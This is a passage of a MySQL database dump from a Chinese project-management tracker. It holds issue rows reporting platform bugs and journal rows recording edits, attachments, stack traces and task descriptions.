07:31:22','2021-03-01',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(274,4,376,'管理员账户无法登录开源项目后台进行管理且报404错误后','\n报404错误后,登录的用户退出登录\n',NULL,NULL,3,NULL,2,NULL,46,'2021-03-02 07:00:27','2021-03-03 03:16:37','2021-03-02',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(275,4,376,'项目筛选,数量仍然对不上','',NULL,NULL,1,NULL,2,NULL,46,'2021-03-02 07:04:46','2021-03-02 09:40:55','2021-03-02',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(276,4,376,'风雷开发者用户无法在线提交代码修改','标红的为修改内容\n\n\n点击“提交”,系统提示“提交成功”,而实际情况是没有任何改变。\n',NULL,NULL,1,NULL,2,NULL,46,'2021-03-03 02:55:26','2021-03-03 02:55:26','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(277,4,376,'镜像其他平台的开源项目速度太慢','\n\n点击“创建项目”后,会一直出现等待界面\n',NULL,NULL,1,NULL,2,NULL,46,'2021-03-03 02:57:23','2021-03-03 02:57:23','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(278,4,376,'新注册用户--详细地址限定的长度过短,只允许10个汉字','',NULL,NULL,3,NULL,2,NULL,181,'2021-03-03 03:00:39','2021-03-03 03:01:15','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(279,4,376,'新注册用户--用户名不容易记忆,是系统自动生成','用户名应该用户修改为有意义的名字,方便用户记忆\n',NULL,NULL,1,NULL,2,NULL,181,'2021-03-03 03:03:26','2021-03-03 03:03:26','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(280,4,376,'新注册用户(权限为开发者)无法克隆项目','新注册用户(权限为开发者)无法使用邮箱和密码克隆项目\n',NULL,NULL,1,NULL,2,NULL,181,'2021-03-03 03:06:03','2021-03-03 03:06:03','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(281,4,376,'语言筛选无效,搜 C++出来 Ruby','\n选择 C出来 C++项目\n',NULL,NULL,1,NULL,2,NULL,181,'2021-03-03 03:06:42','2021-03-03 03:06:42','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(282,4,376,'修改仓库信息报错','',NULL,NULL,3,NULL,2,NULL,181,'2021-03-03 03:08:07','2021-03-03 03:08:07','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(283,4,376,'开源项目--项目搜索报错','http://202.194.133.85/archive/userlogin/',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 03:19:31','2021-03-03 07:28:30','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(284,4,376,'开源项目--按照分类报错','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 06:44:43','2021-03-03 07:30:57','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(285,4,376,'开源项目--项目类别数量报错','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 06:46:47','2021-03-03 07:32:38','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(286,4,376,'开源项目--进入项目详情页出现提示语有问题','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 06:47:04','2021-03-03 07:30:36','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(287,4,376,'用户的消息显示在版块间不同','在开源项目中,没有消息\n\n在其他版块中显示有站内消息\n',NULL,NULL,1,NULL,2,NULL,46,'2021-03-03 06:47:31','2021-03-03 06:47:31','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(288,4,376,'从首页进入开源项目,进入个人中心且弹出错误提示语','\n\n点击开源项目,目前依然跳转到个人中心',NULL,NULL,2,NULL,2,NULL,49,'2021-03-03 06:47:52','2021-03-03 07:30:01','2021-03-03',40,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(289,4,376,'开源项目--修改仓库信息出错','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 06:54:08','2021-03-03 07:30:17','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(290,4,376,'站内消息500错误','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-03 06:54:39','2021-03-03 06:56:05','2021-03-03',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(291,4,376,'创客空间--任务发布时间出错','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 06:55:29','2021-03-03 07:29:54','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(292,4,376,'创客空间--延期时间设计出错,数值变成负数 ','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 06:56:24','2021-03-03 07:29:36','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(293,4,376,'竞赛活动--战队成员出错','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 07:00:56','2021-03-03 07:29:23','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(294,4,376,'竞赛活动--管理员无法查看排行榜','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 07:01:08','2021-03-03 07:29:12','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(295,4,376,'账号管理--账号银行卡个人中心修改后未提示是否修改成功,且与管理界面不一致','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 07:01:28','2021-03-03 07:28:58','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(297,4,376,'开源项目--合并出错','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-03 07:05:59','2021-03-03 07:28:43','2021-03-03',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(298,4,376,'开源项目--风雷项目上传大文件失败','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-04 03:27:49','2021-03-04 07:17:16','2021-03-04',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(299,4,376,'开源项目--文件下载,404错误','\n',NULL,NULL,1,NULL,2,NULL,49,'2021-03-04 07:10:59','2021-03-04 07:17:01','2021-03-04',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(300,4,376,'开源项目--开源项目跟其他板块导航栏不一样','\n',NULL,NULL,1,NULL,2,NULL,49,'2021-03-04 07:16:38','2021-03-04 07:17:27','2021-03-04',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(301,4,376,'开源项目--点击其他分支,直接打开一个文件,且无法看到文件目录','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-05 01:30:37','2021-03-05 01:30:37','2021-03-05',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(302,4,376,'开源项目--风雷用户权限无法修改','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-05 01:38:28','2021-03-05 01:38:28','2021-03-05',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(303,4,376,'个人中心--修改头像不支持png,且没有提示','',NULL,NULL,3,NULL,2,NULL,49,'2021-03-05 01:57:02','2021-03-11 01:47:48','2021-03-05',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(304,4,376,'个人中心--点击修改资料无响应','',NULL,NULL,3,NULL,2,NULL,1,'2021-03-08 06:48:40','2021-03-09 06:17:03','2021-03-08',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(305,4,376,'开源项目--开源项目头像与其他板块不同','修改头像,开源项目头像没有改动\n\n',NULL,NULL,1,49,2,NULL,1,'2021-03-08 06:49:54','2021-03-09 01:15:11','2021-03-08',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(306,4,376,'开源项目--无法主动加入其他人项目。但是项目的创建者却可以添加其他成员,且不需要别人同意','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-10 07:31:53','2021-03-10 07:32:54','2021-03-10',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(307,4,376,'开源项目--添加成员无法使用手机号搜索','',NULL,NULL,1,NULL,2,NULL,49,'2021-03-10 07:38:31','2021-03-10 07:38:31','2021-03-10',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(308,2,376,'1','1',NULL,NULL,1,NULL,2,NULL,1,'2021-03-11 01:38:49','2021-03-11 01:39:01',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL);
|
||
/*!40000 ALTER TABLE `issues` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `journal_details`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `journal_details`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `journal_details` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`journal_id` int(11) NOT NULL DEFAULT '0',
|
||
`property` varchar(30) NOT NULL DEFAULT '',
|
||
`prop_key` varchar(30) NOT NULL DEFAULT '',
|
||
`old_value` text,
|
||
`value` text,
|
||
PRIMARY KEY (`id`),
|
||
KEY `journal_details_journal_id` (`journal_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=331 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `journal_details`
|
||
--
|
||
|
||
LOCK TABLES `journal_details` WRITE;
|
||
/*!40000 ALTER TABLE `journal_details` DISABLE KEYS */;
|
||
INSERT INTO `journal_details` VALUES (2,2,'attr','description','','the explanation of inserting sort can be improved'),(3,3,'attachment','74',NULL,'cookies3.txt'),(4,3,'attachment','75',NULL,'cookies2.txt'),(5,4,'attachment','78',NULL,'QQ图片20170621113033.gif'),(6,5,'attachment','79',NULL,'kosasa01cookie.txt'),(7,6,'attachment','80',NULL,'cookies3.txt'),(8,7,'attachment','81',NULL,'QQ图片20170621113033.gif'),(9,8,'attachment','84',NULL,'cookies2.txt'),(10,9,'attachment','85',NULL,'QQ图片20170621113033.gif'),(11,11,'attachment','97',NULL,'20180709.jpg'),(12,12,'attachment','113',NULL,'SceneData.xlsx'),(13,19,'attr','description','RedBlackBST Implementation by Java ','RedBlackBST Implementation by Java \n'),(14,20,'attr','description','RedBlackBST Implementation by Java \n','RedBlackBST Implementation by Java '),(15,21,'attr','description','\n\n','\n\n\n\n'),(16,22,'attr','description','\n\n\n\n','\n\n\n\n'),(17,23,'attr','description','\n\n\n\n','\n\n\n\n\n\n'),(18,24,'attr','description','\n\n\n\n\n\n','\n\n\n\n\n\n\n\n'),(19,29,'attachment','153',NULL,'微信图片_20180716154656.png'),(20,31,'attr','priority_id','2','4'),(21,32,'attr','status_id','1','2'),(22,32,'attr','fixed_version_id',NULL,'1'),(23,32,'attr','done_ratio','0','50'),(24,33,'attr','status_id','2','5'),(25,33,'attr','done_ratio','50','100'),(26,34,'attr','priority_id','3','5'),(27,35,'attr','due_date',NULL,'2019-01-23'),(28,36,'attr','description','','添加描述'),(29,37,'attr','done_ratio','0','100'),(30,38,'attr','done_ratio','100','0'),(31,39,'attr','status_id','1','3'),(32,39,'attr','done_ratio','0','100'),(33,40,'attr','description','','描述'),(34,41,'attr','done_ratio','0','100'),(36,47,'attr','description','为了更高效、便捷地解决大家遇到的问题,请在此模块提交帖子时:\n1. 用准确的术语把问题描述清楚;\n2. 配上必要的说明,如问题产生的背景、出现问题时的现场,尽量用文本格式,编辑器本身有强大的代码块插入功能,如下面示例代码所示:\n```cpp\n\n#include \"rosplane_sim/aircraft_forces_and_moments.h\"\n\nnamespace gazebo\n{\nAircraftForcesAndMoments::~AircraftForcesAndMoments()\n}\n```\n3. 确有必要,可以适当添加图片或附件。','为了更高效、便捷地解决大家遇到的问题,请在此模块提交帖子时:\n1. 用准确的术语把问题描述清楚;\n2. 配上必要的说明,如问题产生的背景、出现问题时的现场,尽量用文本格式,编辑器本身有强大的代码块插入功能,如下面示例代码所示:\n```cpp\nnamespace gazebo\n{\nAircraftForcesAndMoments::~AircraftForcesAndMoments()\n}\n```\n3. 确有必要,可以适当添加图片或附件。'),(37,48,'attr','description','为了更高效、便捷地解决大家遇到的问题,请在此模块提交帖子时:\n1. 用准确的术语把问题描述清楚;\n2. 配上必要的说明,如问题产生的背景、出现问题时的现场,尽量用文本格式,编辑器本身有强大的代码块插入功能,如下面示例代码所示:\n```cpp\nnamespace gazebo\n{\nAircraftForcesAndMoments::~AircraftForcesAndMoments()\n}\n```\n3. 确有必要,可以适当添加图片或附件。','为了更高效、便捷地解决大家遇到的问题,请在此模块提交帖子时:\n1. 用准确的术语把问题描述清楚;\n2. 配上必要的说明,如问题产生的背景、出现问题时的现场,尽量用**文本格式**,编辑器本身有强大的代码块插入功能,如下面示例代码所示:\n```cpp\nnamespace gazebo\n{\nAircraftForcesAndMoments::~AircraftForcesAndMoments()\n}\n```\n3. 确有必要,可以适当添加图片或附件。'),(38,49,'attr','tracker_id','1','2'),(39,49,'attr','priority_id','3','5'),(43,69,'attachment','773',NULL,'消息通知--白屏01.png'),(44,69,'attachment','774',NULL,'消息通知--白屏02.png'),(45,71,'attr','done_ratio','0','100'),(46,77,'attr','status_id','1','3'),(47,77,'attr','done_ratio','0','100'),(48,79,'attr','fixed_version_id',NULL,'9'),(49,84,'attr','status_id','1','3'),(50,84,'attr','done_ratio','0','100'),(51,93,'attr','tracker_id','1','2'),(52,93,'attr','due_date',NULL,'2019-09-06'),(53,93,'attr','priority_id','2','3'),(54,93,'attr','fixed_version_id',NULL,'11'),(55,94,'attr','status_id','1','3'),(56,94,'attr','done_ratio','0','100'),(57,95,'attr','done_ratio','100','90'),(58,96,'attr','assigned_to_id',NULL,'49'),(59,96,'attr','done_ratio','90','100'),(60,96,'attr','estimated_hours',NULL,'12.0'),(61,97,'attr','status_id','1','3'),(62,97,'attr','done_ratio','0','100'),(63,98,'attr','fixed_version_id',NULL,'10'),(64,99,'attr','tracker_id','2','1'),(65,99,'attr','due_date',NULL,'2019-11-08'),(66,99,'attr','fixed_version_id',NULL,'10'),(67,99,'attr','done_ratio','0','100'),(68,99,'attr','estimated_hours',NULL,'6.0'),(69,100,'attr','status_id','1','3'),(70,100,'attr','fixed_version_id',NULL,'11'),(71,100,'attr','done_ratio','0','100'),(72,101,'attr','status_id','1','3'),(73,101,'attr','priority_id','2','4'),(74,101,'attr','fixed_version_id',NULL,'11'),(75,101,'attr','done_ratio','0','100'),(76,102,'attr','tracker_id','1','2'),(77,102,'attr','description','\nAttributeError Traceback (most recent call last)\nin ()\n1 q = QueryByDate(start_date, end_date, kType=Query.DAY)\n----> 2 my_sys.run(stk, q)\n3\n4 #将交易记录及持仓情况,保存在临时目录,可用Excel查看\n5 #临时目录一般设置在数据所在目录下的 tmp 子目录\n\nin _getBuyNumber(self, datetime, stk, price, risk)\n14\n15 def _getBuyNumber(self, datetime, stk, price, risk):\n---> 16 tm = self.getTM()\n17 cash = tm.currentCash\n18\n\nAttributeError: \'DEMO_MM\' object has no attribute \'getTM\'','AttributeError Traceback (most recent call last)\nin ()\n1 q = QueryByDate(start_date, end_date, kType=Query.DAY)\n----> 2 my_sys.run(stk, q)\n3\n4 #将交易记录及持仓情况,保存在临时目录,可用Excel查看\n5 #临时目录一般设置在数据所在目录下的 tmp 子目录\n\nin _getBuyNumber(self, datetime, stk, price, risk)\n14\n15 def _getBuyNumber(self, datetime, stk, price, risk):\n---> 16 tm = self.getTM()\n17 cash = tm.currentCash\n18\n\nAttributeError: \'DEMO_MM\' object has no attribute \'getTM\''),(78,102,'attr','priority_id','2','3'),(79,102,'attr','fixed_version_id',NULL,'11'),(80,102,'attr','done_ratio','0','100'),(81,103,'attr','tracker_id','1','4'),(82,103,'attr','priority_id','2','1'),(83,103,'attr','fixed_version_id',NULL,'11'),(84,103,'attr','done_ratio','0','100'),(85,104,'attr','tracker_id','1','2'),(86,104,'attr','fixed_version_id',NULL,'11'),(87,104,'attr','done_ratio','0','100'),(88,105,'attr','tracker_id','1','2'),(89,105,'attr','fixed_version_id',NULL,'11'),(90,105,'attr','done_ratio','0','100'),(91,106,'attr','tracker_id','1','3'),(92,106,'attr','done_ratio','0','100'),(93,107,'attr','status_id','1','3'),(94,107,'attr','done_ratio','0','100'),(95,108,'attr','status_id','1','3'),(96,108,'attr','done_ratio','0','100'),(97,109,'attr','status_id','1','3'),(98,109,'attr','done_ratio','0','100'),(99,110,'attr','status_id','1','3'),(100,110,'attr','done_ratio','0','100'),(101,111,'attr','status_id','1','3'),(102,111,'attr','done_ratio','0','100'),(103,112,'attr','status_id','1','3'),(104,112,'attr','done_ratio','0','100'),(105,113,'attr','status_id','1','3'),(106,113,'attr','done_ratio','0','100'),(107,114,'attr','status_id','1','3'),(108,114,'attr','done_ratio','0','100'),(109,115,'attr','tracker_id','1','4'),(110,116,'attr','tracker_id','1','5'),(111,117,'attr','tracker_id','1','3'),(112,118,'attr','tracker_id','1','2'),(113,120,'attr','status_id','1','3'),(114,120,'attr','fixed_version_id',NULL,'10'),(115,120,'attr','done_ratio','0','100'),(116,121,'attr','status_id','1','3'),(117,121,'attr','fixed_version_id',NULL,'10'),(118,121,'attr','done_ratio','0','100'),(119,122,'attr','status_id','1','3'),(120,122,'attr','fixed_version_id',NULL,'10'),(121,122,'attr','done_ratio','0','100'),(122,123,'attr','status_id','1','3'),(123,123,'attr','fixed_version_id',NULL,'10'),(124,123,'attr','done_ratio','0','100'),(125,125,'attr','status_id','1','3'),(126,125,'attr','done_ratio','0','100'),(127,126,'attr','status_id','1','3'),(128,126,'attr','done_ratio','0','100'),(129,127,'attr','status_id','1','3'),(130,127,'attr','done_ratio','0','100'),(131,128,'attr','description','\n\nCaused by: com.mysql.cj.exceptions.UnableToConnectException: CLIENT_PLUGIN_AUTH is required\n\n报这个异常,网上说版本太高,我的mysql 是8.0.17,于是我又换了驱动版本5.1.47\n然后又是这个异常\njava.sql.SQLException: Unknown system variable \'query_cache_size\'\n','\nCaused by: com.mysql.cj.exceptions.UnableToConnectException: CLIENT_PLUGIN_AUTH is required\n\n报这个异常,网上说版本太高,我的mysql 是8.0.17,于是我又换了驱动版本5.1.47\n然后又是这个异常\njava.sql.SQLException: Unknown system variable \'query_cache_size\'\n'),(132,128,'attr','status_id','1','3'),(133,128,'attr','done_ratio','0','100'),(135,132,'attr','description','不参与分表的SQL能不能不被改写呀?比如limit 2,10被改写成了limit 0,12.','不参与分表的SQL能不能不被改写呀?比如limit 2,10被改写成了limit 0,12.\n我还有其他问题,如 add 1, 7'),(136,133,'attr','subject','集成springboot,insert 报空指针异常 sharding-jdbc-spring-boot-starter ','集成springboot,insert 报空指针异常 sharding-jdbc-spring-boot-starter 2'),(137,134,'attr','description','Caused by: java.lang.NullPointerException\nat io.shardingsphere.core.jdbc.metadata.dialect.JDBCShardingRefreshHandler.execute(JDBCShardingRefreshHandler.java:49)\nat io.shardingsphere.core.jdbc.core.statement.ShardingPreparedStatement.execute(ShardingPreparedStatement.java:159)\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\nat java.lang.reflect.Method.invoke(Method.java:498)\nat org.apache.ibatis.logging.jdbc.PreparedStatementLogger.invoke(PreparedStatementLogger.java:59)\nat com.sun.proxy.$Proxy96.execute(Unknown Source)\nat org.apache.ibatis.executor.statement.PreparedStatementHandler.update(PreparedStatementHandler.java:46)\nat org.apache.ibatis.executor.statement.RoutingStatementHandler.update(RoutingStatementHandler.java:74)\nat org.apache.ibatis.executor.SimpleExecutor.doUpdate(SimpleExecutor.java:50)\nat org.apache.ibatis.executor.BaseExecutor.update(BaseExecutor.java:117)\nat org.apache.ibatis.executor.CachingExecutor.update(CachingExecutor.java:76)\nat org.apache.ibatis.session.defaults.DefaultSqlSession.update(DefaultSqlSession.java:198)\n... 40 more','Caused by: java.lang.NullPointerException\nat io.shardingsphere.core.jdbc.metadata.dialect.JDBCShardingRefreshHandler.execute(JDBCShardingRefreshHandler.java:49)\nat io.shardingsphere.core.jdbc.core.statement.ShardingPreparedStatement.execute(ShardingPreparedStatement.java:159)\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\nat java.lang.reflect.Method.invoke(Method.java:498)\nat org.apache.ibatis.logging.jdbc.PreparedStatementLogger.invoke(PreparedStatementLogger.java:59)\nat com.sun.proxy.$Proxy96.execute(Unknown Source)\nat org.apache.ibatis.executor.statement.PreparedStatementHandler.update(PreparedStatementHandler.java:46)\nat org.apache.ibatis.executor.statement.RoutingStatementHandler.update(RoutingStatementHandler.java:74)\nat org.apache.ibatis.executor.SimpleExecutor.doUpdate(SimpleExecutor.java:50)\nat org.apache.ibatis.executor.BaseExecutor.update(BaseExecutor.java:117)\nat org.apache.ibatis.executor.CachingExecutor.update(CachingExecutor.java:76)\nat org.apache.ibatis.session.defaults.DefaultSqlSession.update(DefaultSqlSession.java:198)\n... 40 more\n... 45 goto org.171'),(138,135,'attr','status_id','3','2'),(139,135,'attr','done_ratio','100','50'),(141,137,'attr','tracker_id','1','4'),(142,137,'attr','due_date',NULL,'2020-02-16'),(143,137,'attr','assigned_to_id',NULL,'81'),(144,137,'attr','fixed_version_id',NULL,'21'),(145,137,'attr','is_private','0','1'),(146,138,'attr','subject','算法调研——','算法调研'),(147,143,'attr','tracker_id','1','4'),(148,143,'attr','due_date',NULL,'2020-02-29'),(149,143,'attr','assigned_to_id','86','90'),(150,143,'attr','fixed_version_id',NULL,'21'),(151,143,'attr','is_private','0','1'),(153,146,'attr','description','1.对PHOENIXEngine开源项目进行背景、功能和总体代码框架分析;\n2.对该开源项目的关键模块进行code review;\n3.提出二次开发方案,基于该代码进行功能模块或应用设计,并考虑micROS可借鉴和可结合的部分。\n','1.对PHOENIXEngine开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2.对该开源项目的关键模块进行code review (10000行以上),绘制模块间调用关系图;\n3.提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n'),(154,147,'attr','description','1. 对Kaldi开源项目进行背景、功能和总体代码框架分析;\n2. 对开源项目的关键模块进行code review;\n3. 提出二次开发方案,基于该代码进行功能模块或应用设计,并考虑micROS可借鉴和可结合的部分。\n','1. 对Kaldi开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2. 对开源项目的关键模块进行code review(10000行以上),绘制模块间调用关系图;\n3. 提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n\n'),(155,148,'attr','description','1. 对buzz开源项目进行背景/功能和总体代码框架分析;\n2. 对buzz开源项目的关键模块进行codereview;\n3. 提出二次开发方案,基于该代码进行功能模块或应用设计,并考虑micROS可借鉴和可结合的部分。\n','1.对BUZZ开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2.对该开源项目的关键模块进行code review (10000行以上),绘制模块间调用关系图;\n3.提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n\n'),(156,149,'attr','done_ratio','0','100'),(157,150,'attr','done_ratio','0','100'),(158,151,'attr','assigned_to_id',NULL,'47'),(159,152,'attr','priority_id','1','3'),(160,154,'attr','assigned_to_id',NULL,'47'),(161,154,'attr','status_id','1','3'),(162,154,'attr','done_ratio','0','100'),(163,156,'attr','assigned_to_id',NULL,'47'),(164,156,'attr','status_id','1','3'),(165,156,'attr','done_ratio','0','100'),(166,157,'attr','assigned_to_id',NULL,'47'),(167,157,'attr','status_id','1','3'),(168,157,'attr','done_ratio','0','100'),(169,158,'attr','assigned_to_id',NULL,'47'),(170,158,'attr','status_id','1','3'),(171,158,'attr','done_ratio','0','100'),(172,159,'attr','assigned_to_id',NULL,'47'),(173,159,'attr','status_id','1','3'),(174,159,'attr','done_ratio','0','100'),(175,160,'attr','assigned_to_id',NULL,'47'),(176,160,'attr','status_id','1','3'),(177,160,'attr','done_ratio','0','100'),(178,161,'attr','subject','开源项目--新建文件','开源项目--新建文件--返回'),(179,162,'attr','merge','','该合并请求已被合并'),(180,164,'attr','description','新建任务中,点击上传文件后,提示上传成功,但是却无法看到。','新建任务中,点击上传文件后,作为附件,提示上传成功,但是却无法看到。附件丢了!'),(181,165,'attr','merge','','该合并请求已被合并'),(182,166,'attr','subject','开源项目--新建任务','开源项目--新建任务--附件丢了'),(183,166,'attr','priority_id','1','3'),(184,167,'attr','description','名为“人工智能3级板块的”无法删除','名为“人工智能3级板块的”无法删除\n'),(185,169,'attr','description','名为“人工智能3级板块的”无法删除\n','名为“人工智能3级板块的”无法删除\n'),(186,170,'attr','description','名为“人工智能3级板块的”无法删除\n','名为“人工智能3级板块的”无法删除\n\n'),(187,171,'attr','description','名为“人工智能3级板块的”无法删除\n\n','名为“人工智能3级板块的”无法删除\n\n'),(188,172,'attr','assigned_to_id',NULL,'47'),(189,172,'attr','priority_id','1','3'),(190,175,'attr','description','\n\n\nhttp://39.105.176.215/forums/336/detail','\n\n\nhttp://39.105.176.215/forums/336/detail\nhttp://39.105.176.215/forums/336/detail'),(191,176,'attr','description','\n\n\nhttp://39.105.176.215/forums/336/detail\nhttp://39.105.176.215/forums/336/detail','\n\n\nhttp://39.105.176.215/forums/336/detail\n\nhttp://39.105.176.215/forums/183/detail'),(192,177,'attr','assigned_to_id',NULL,'47'),(193,177,'attr','priority_id','3','5'),(194,178,'attr','status_id','1','3'),(195,178,'attr','done_ratio','0','100'),(196,180,'attr','status_id','1','3'),(197,180,'attr','done_ratio','0','100'),(198,181,'attr','status_id','1','3'),(199,181,'attr','done_ratio','0','100'),(200,182,'attr','status_id','1','3'),(201,182,'attr','done_ratio','0','100'),(202,183,'attr','status_id','1','3'),(203,183,'attr','done_ratio','0','100'),(204,184,'attr','status_id','1','3'),(205,184,'attr','done_ratio','0','100'),(206,185,'attr','status_id','1','3'),(207,185,'attr','done_ratio','0','100'),(208,186,'attr','status_id','1','3'),(209,186,'attr','done_ratio','0','100'),(210,187,'attr','description','\nhttp://39.105.176.215/forums/183/detail','\n\n\n'),(211,187,'attr','priority_id','1','3'),(212,188,'attr','description','\n\n\n','39.105.176.215/forums/241/detail\n\n\n\n'),(213,189,'attr','merge','','该合并请求已被合并'),(214,190,'attr','status_id','1','3'),(215,190,'attr','done_ratio','0','100'),(216,192,'attr','status_id','1','3'),(217,192,'attr','done_ratio','0','100'),(218,194,'attr','status_id','1','3'),(219,194,'attr','done_ratio','0','100'),(220,195,'attr','status_id','1','3'),(221,195,'attr','done_ratio','0','100'),(222,196,'attr','status_id','1','3'),(223,196,'attr','done_ratio','0','100'),(224,198,'attr','status_id','1','3'),(225,198,'attr','done_ratio','0','100'),(226,200,'attr','status_id','1','3'),(227,200,'attr','done_ratio','0','100'),(228,201,'attr','status_id','1','3'),(229,201,'attr','done_ratio','0','100'),(230,202,'attr','status_id','1','3'),(231,202,'attr','done_ratio','0','100'),(232,204,'attr','status_id','1','3'),(233,204,'attr','done_ratio','0','100'),(234,205,'attr','status_id','1','3'),(235,205,'attr','done_ratio','0','100'),(236,209,'attr','merge','','该合并请求已被合并'),(237,210,'attr','status_id','3','2'),(238,210,'attr','done_ratio','100','20'),(239,211,'attr','description','\n39.105.176.215/forums/337/detail','\n39.105.176.215/forums/337/detail\n\n39.105.176.215/accounts/undefined'),(240,212,'attr','subject','竞赛活动,通知公告,只能显示一条的内容','竞赛活动,通知公告,只能显示一条详细的内容'),(241,214,'attr','status_id','3','1'),(242,214,'attr','done_ratio','100','0'),(245,216,'attr','status_id','1','3'),(246,216,'attr','done_ratio','0','100'),(247,219,'attachment','3','','开源项目——新建文件.PNG,开源项目——新建文件03.PNG,开源项目——新建文件04.PNG'),(248,221,'attr','status_id','1','3'),(249,221,'attr','done_ratio','0','100'),(250,222,'attr','status_id','1','3'),(251,222,'attr','done_ratio','0','100'),(252,2